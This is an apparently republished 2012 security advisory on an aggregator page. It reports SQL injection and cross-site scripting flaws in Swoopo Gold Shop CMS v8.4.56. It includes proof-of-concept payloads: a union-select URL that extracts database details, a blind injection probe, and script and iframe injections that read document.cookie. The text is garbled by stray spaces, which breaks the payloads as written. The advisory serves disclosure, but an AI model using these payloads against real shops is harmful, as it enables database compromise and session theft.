Swoopo Gold Shop CMS v8.4.56 multiple web Defects

Source: Internet
Author: User
Tags contact form

Title: Swoopo Gold Shop CMS v8.4.56-Multiple Web Vulnerabilities
 
Overview:
==================
Swoopo Gold is a shop content management system coded with PHP, Jsp & connected via MySQL Database.
For detailed procedures, see: Vendor Homepage: http://itechscripts.com/swoopo_clone.html)
 
 
Abstract:
==========
Multiple defects found in ITtechScripts Swoopo Gold Shop CMS v8.4.56.
 
Affected products: ITechScripts
Product: Swoopo Gold Shop CMS v8.4.56
 
Technical analysis:
==========
Details:
==========
1.1
A remote SQL Injection vulnerability is detected in ITtechScripts Swoopo Gold Shop CMS v8.4.56.
The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own SQL commands
On the affected application dbms. Successful exploitation of the vulnerability results in dbms & application compromise.
The vulnerability is located on the username post method.
 
Vulnerable Module (s ):
[+] EX_DATE-ID
 
 
1.2
A blind SQL Injection vulnerability is detected in ITtechScripts Swoopo Gold Shop CMS v8.4.56.
The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own SQL commands
On the affected application dbms. Successful exploitation of the vulnerability results in dbms & application compromise.
The vulnerability is located on the itechd. php file in the product id value.
 
Vulnerable Module (s ):
[+] Itechd-Product ID
 
 
 
2.1
Multiple persistent input validation vulnerabilities are detected in ITtechScripts Swoopo Gold Shop CMS v8.4.56.
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent ).
Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent)
Context manipulation. Exploitation requires low user inter action because the admin needs to watch the user list.
The user has des his scriptcode as profile name and the code is getting executed on the administrator section
Persistent.
 
 
Vulnerable Module (s ):
[+] Contact Form-TEXT NAME
[+] TellaFreind-E-Mail ID
 
 
2.2
Multiple non persistent cross site scripting vulnerabilities are detected in ITtechScripts Swoopo Gold Shop CMS v8.4.56.
The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with high required
User inter action or local low privileged user account. Successful exploitation can result in account steal, phishing
& Client-side content request manipulation.
 
Vulnerable Module (s ):
[+] All_Live
[+] List_Type
[+] User_Reg-TxTcity
[+] Reviewitechds-Product ID
 
 
Proof of Concept:
========================
1.1
The SQL inejction vulnerability can be exploited by remote attackers without required user inter action.
For demonstration or reproduce...
 
Poc:
<A href = "http: // 127.0.0.1: 80/swoopogold/ex_date.php? Id =-595 + union + select + version % 28% 29, database % 28% 28%, 3, 4, user % 29 -- % 20-">
</a>
 
 
 
1.2
The blind SQL inejction vulnerability can be exploited by remote attackers without required user inter action.
For demonstration or reproduce...
 
PoC:
Pay = Select % 20 Payment % 20 Method & paymentid = 1 & productid = 576% 24% 7b [BLIND SQL-INJECTION VULNERABILITY] % 7d & recycle = [rem0ve]
 
<A href = "http: // 127.0.0.1: 80/swoopogold/itechd. php? Productid = 604 + AND + 1 = 2 -- % 20-[BLIND SQL-INJECTION VULNERABILITY] ">
</a>
 
 
 
2.1
The input validation vulnerabilities can be exploited by remote attackers with low-medium required user inter action.
For demonstration or reproduce...
 
 
Review: Contact Name Output
 
<Form name = "frmContact" action = "contact. php" method = "post"> </form>
<Tr> <td colspan = "3" align = "right">
<Font color = "red"> Fields marked with an asterisk (*)
Are required </font> </td> </tr>
<Tr> <td> <blockquote>
 
</blockquote> </td>
<Td> <font class = "head_font" color = "red">
The following must be corrected before continuing: </font> </td>
</Tr>
<Tr> <td> </td> <td> Dont match
Image </td> </tr>
<Tr> <td colspan = "2" align = "center"> </Td> </tr>
<Tr> <td> <blockquote> <B> Name <font color = "red"> * </font> </B>
</Blockquote> </td>
<Td>
<Input name = "txtName" class = "txtbox" value = "\" type = "text">
<Iframe src = "a" onload = 'alert ("VL") '<"size =" 20 "> </td>
</Tr> <td> <blockquote> </B> <B> Email
Id <font color = "red"> * </font> </B> </td>
 
<Td>
<Input type = "text" name = "txtEmail" class = "txtbox" value = "gabber@aol.com" size = "20"> </td>
</Tr>
<Tr>
<Td> <blockquote> <B> Company Name </B> </td>
<Td>
 
<Input type = "text" name = "txtCname" class = "txtbox"
Value = "\"> <iframe src = a onload = alert ("VL") <"size =" 25 "> </td>
</Tr>
 
Http://www.bkjia.com/swoopogold/contact. php
 
 
 
Review: TellaFriend Listing Output
 
<Tbody> <tr>
<Td class = "ct"> <B> Email id </B> </td>
<Td class = "ct"> <B> Date </B> </td>
<Td class = "ct"> Registration Details </td>
</Tr>
<Tr>
<Td> chaudhurisuvarthi@gmail.com </td>
<Td> 16:08:54 </td>
<Td> no </td>
</Tr>
<Tr>
<Td>-1' </td>
<Td> 17:51:41 </td>
<Td> no </td>
</Tr>
<Tr>
<Td> "<script> alert (document. cookie) </script> </td>
<Td> 17:52:08 </td>
<Td> no </td>
</Tr>
</Tbody>
 
URL: http://www.bkjia.com/swoopogold/tellafriend. php
 
 
 
2.2
The non persistent cross site scripting vulnerabilities can be exploited by remote attackers with medium
Or high required user inter action. For demonstration or reproduce...
 
Note: URL encoded GET via input cats_id.
 
PoC:
All_live.php? Cats_id = <script> alert (document. cookie) </script> & list_type = 0
All_live.php? Cats_id = 14 & list_type = <script> alert (document. cookie) </script>
Reviewitechds. php? Productid = % <script> alert (document. cookie) </script> & recycle = yes
 
POST (multipart) input txtcity set "onmouseover = prompt (1337) =">
The input is getting reflected executed out of the tag element
 
 

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use
Other media, are reserved by Vulnerability-Lab Research Team or its suppliers.
 
Copyright©2012 Vulnerability-Lab

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.